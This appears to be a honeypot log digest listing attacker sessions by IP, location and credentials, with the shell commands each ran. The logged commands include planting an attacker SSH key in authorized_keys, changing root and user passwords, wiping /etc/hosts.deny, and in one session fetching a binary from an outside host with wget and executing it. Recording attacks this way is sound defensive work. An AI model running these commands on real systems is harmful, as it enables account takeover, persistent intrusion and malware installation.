$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "geo\nRMBTQc0G5Qge\nRMBTQc0G5Qge"|passwd|bash
$ echo "geo\nRMBTQc0G5Qge\nRMBTQc0G5Qge\n"|passwd
$ echo -e "123456\nwkSMdg6tRKwa\nwkSMdg6tRKwa"|passwd|bash
$ echo "123456\nwkSMdg6tRKwa\nwkSMdg6tRKwa\n"|passwd
🎭 shadow_root_43 (195.226.23.108) β€” Kilchberg, Switzerland Β· 1 session Β· 9 cmds
2026-05-30 16:42 EDT Β· as admin/Qwerty1
OS/kernel identification β†’ hostname discovery β†’ process termination β†’ make executable (world) β†’ execute payload
$ uname -a // OS/kernel identification
$ hostname // hostname discovery
$ uname -m&&pkill upnpsetup // process termination
$ sudo pkill upnpsetup // process termination
$ rm ./upnpsetup
$ wget -nc http://45.87.174.8/k.php?a=x86_64,X2V504E52N0H8733H -O ./upnpsetup
$ chmod 777 ./upnpsetup // make executable (world)
$ sudo ./upnpsetup
$ ./upnpsetup // execute payload
🎭 specter_root_49 (200.11.141.86) β€” Caracas, Venezuela Β· 1 session Β· 20 cmds
2026-05-30 16:03 EDT Β· as user/user@2025
OS/kernel identification β†’ hostname discovery β†’ process termination β†’ make executable (world) β†’ execute payload
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "user@2025\ncUERglcKZqET\ncUERglcKZqET"|passwd|bash
$ Enter new UNIX password:
$ echo "user@2025\ncUERglcKZqET\ncUERglcKZqET\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_44 (114.111.54.189) β€” Singapore, Singapore Β· 1 session Β· 19 cmds
2026-05-30 16:01 EDT Β· as root/Qweasd123456
OS/kernel identification β†’ hostname discovery β†’ process termination β†’ make executable (world) β†’ execute payload
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:0G7YpDMjznXt"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 bear_root (81.177.101.45) β€” Moscow, Russia Β· 5 sessions Β· 97 cmds
2026-05-21 19:52 EDT Β· as amine/amine, amir/amir1234, root/Aa123123.
OS/kernel identification β†’ hostname discovery β†’ process termination β†’ make executable (world) β†’ execute payload
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—5 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—5 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—5 // CPU profiling
$ echo "root:xjKwBS1KTisf"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—3 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—5 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—5
$ ls -lh $(which ls) Γ—5
$ which ls Γ—5
$ crontab -l Γ—5 // persistence setup
$ w Γ—5 // logged-in users check
$ uname -m Γ—5
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—5 // CPU profiling
$ top Γ—5 // process monitoring
$ uname Γ—5 // OS identification
$ uname -a Γ—5 // OS/kernel identification
$ whoami Γ—5 // privilege check
$ lscpu | grep Model Γ—5
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—5
$ echo -e "amine\nXhP8cPdGf098\nXhP8cPdGf098"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "amine\nXhP8cPdGf098\nXhP8cPdGf098\n"|passwd
$ echo "root:OMRJJuNcPc7e"|chpasswd|bash
$ echo -e "amir1234\nRhUiqdl7g14a\nRhUiqdl7g14a"|passwd|bash
$ echo "amir1234\nRhUiqdl7g14a\nRhUiqdl7g14a\n"|passwd
$ echo "root:YOc7B3lOzD9l"|chpasswd|bash
🎭 rogue_root_47 (103.26.136.173) β€” Dhaka, Bangladesh Β· 1 session Β· 19 cmds
2026-05-30 13:15 EDT Β· as root/qq666666
OS/kernel identification β†’ hostname discovery β†’ process termination β†’ make executable (world) β†’ execute payload
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:huH3CJV8uOSy"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 dutch_root (45.156.87.166) β€” Eygelshoven, Netherlands Β· 2 sessions Β· 2 cmds
2026-05-30 12:05 EDT Β· as root/1q2w3e4r, runner/test
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m Γ—2
🎭 wok_root_11 (124.70.28.114) β€” Beijing, China Β· 1 session Β· 1 cmd
2026-05-30 12:15 EDT Β· as root/Swissmp2025!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 phantom_root_42 (103.134.154.36) β€” Singapore, Singapore Β· 2 sessions Β· 22 cmds
2026-05-22 16:34 EDT Β· as igor/igor, kodi/kodi
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "kodi\nP5Yt5DONZ9SR\nP5Yt5DONZ9SR"|passwd|bash
$ Enter new UNIX password:
$ echo "kodi\nP5Yt5DONZ9SR\nP5Yt5DONZ9SR\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 bibimbap_root_5 (1.214.214.114) β€” Yongsan-gu, South Korea Β· 1 session Β· 20 cmds
2026-05-30 11:58 EDT Β· as kodi/kodi
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "kodi\nr9sdKfIQbASC\nr9sdKfIQbASC"|passwd|bash
$ Enter new UNIX password:
$ echo "kodi\nr9sdKfIQbASC\nr9sdKfIQbASC\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wraith_root_46 (179.33.210.213) β€” MedellΓ­n, Colombia Β· 1 session Β· 20 cmds
2026-05-30 11:57 EDT Β· as kodi/kodi
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "kodi\nABEuMdy1Zk7c\nABEuMdy1Zk7c"|passwd|bash
$ Enter new UNIX password:
$ echo "kodi\nABEuMdy1Zk7c\nABEuMdy1Zk7c\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 stroopwafel_root_9 (144.31.157.103) β€” Amsterdam, Netherlands Β· 1 session Β· 20 cmds
2026-05-30 11:22 EDT Β· as musicbot/musicbot
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "musicbot\neYBS2gfwYvUt\neYBS2gfwYvUt"|passwd|bash
$ Enter new UNIX password:
$ echo "musicbot\neYBS2gfwYvUt\neYBS2gfwYvUt\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wok_root_12 (118.196.116.42) β€” Haidian, China Β· 1 session Β· 19 cmds
2026-05-30 10:59 EDT Β· as root/Root123456.
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:emYXGTPzn1he"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_2 (203.171.29.193) β€” Hanoi, Vietnam Β· 1 session Β· 1 cmd
2026-05-30 10:32 EDT Β· as wang/wang123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m
🎭 ghost_root_60 (85.159.4.32) β€” Lviv, Ukraine Β· 1 session Β· 19 cmds
2026-05-30 09:52 EDT Β· as root/aA123123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:1c9Zd3i60YCc"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_48 (62.60.234.140) β€” Riga, Latvia Β· 2 sessions Β· 39 cmds
2026-05-30 08:58 EDT Β· as anything/anything, root/s
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:yU6CSpzPU7LX"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "anything\nT5HdTNeKDUdF\nT5HdTNeKDUdF"|passwd|bash
$ Enter new UNIX password:
$ echo "anything\nT5HdTNeKDUdF\nT5HdTNeKDUdF\n"|passwd
🎭 seoul_root (121.168.139.251) β€” Suwon, South Korea Β· 5 sessions Β· 100 cmds
2026-05-10 19:36 EDT Β· as curl/welltech12, dci/dci, mailuser/123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—5 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—5 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—5 // CPU profiling
$ echo -e "dci\n1dcjtccWQ0Xj\n1dcjtccWQ0Xj"|passwd|bash
$ Enter new UNIX password: Γ—5
$ echo "dci\n1dcjtccWQ0Xj\n1dcjtccWQ0Xj\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—5 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—5
$ ls -lh $(which ls) Γ—5
$ which ls Γ—5
$ crontab -l Γ—5 // persistence setup
$ w Γ—5 // logged-in users check
$ uname -m Γ—5
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—5 // CPU profiling
$ top Γ—5 // process monitoring
$ uname Γ—5 // OS identification
$ uname -a Γ—5 // OS/kernel identification
$ whoami Γ—5 // privilege check
$ lscpu | grep Model Γ—5
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—5
$ echo -e "mb\ngyqlwK7VRYYH\ngyqlwK7VRYYH"|passwd|bash
$ echo "mb\ngyqlwK7VRYYH\ngyqlwK7VRYYH\n"|passwd
$ echo -e "123456\n64GcoC8kQZWE\n64GcoC8kQZWE"|passwd|bash
$ echo "123456\n64GcoC8kQZWE\n64GcoC8kQZWE\n"|passwd
$ echo -e "welltech12\nfELtav6DOxBm\nfELtav6DOxBm"|passwd|bash
$ echo "welltech12\nfELtav6DOxBm\nfELtav6DOxBm\n"|passwd
$ echo -e "demo1234\n4hz0n1G2DxYV\n4hz0n1G2DxYV"|passwd|bash
$ echo "demo1234\n4hz0n1G2DxYV\n4hz0n1G2DxYV\n"|passwd
🎭 rogue_root_49 (154.83.12.172) β€” Hong Kong, Hong Kong Β· 3 sessions Β· 59 cmds
2026-05-24 14:11 EDT Β· as anything/anything, root/s, testuser/123123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
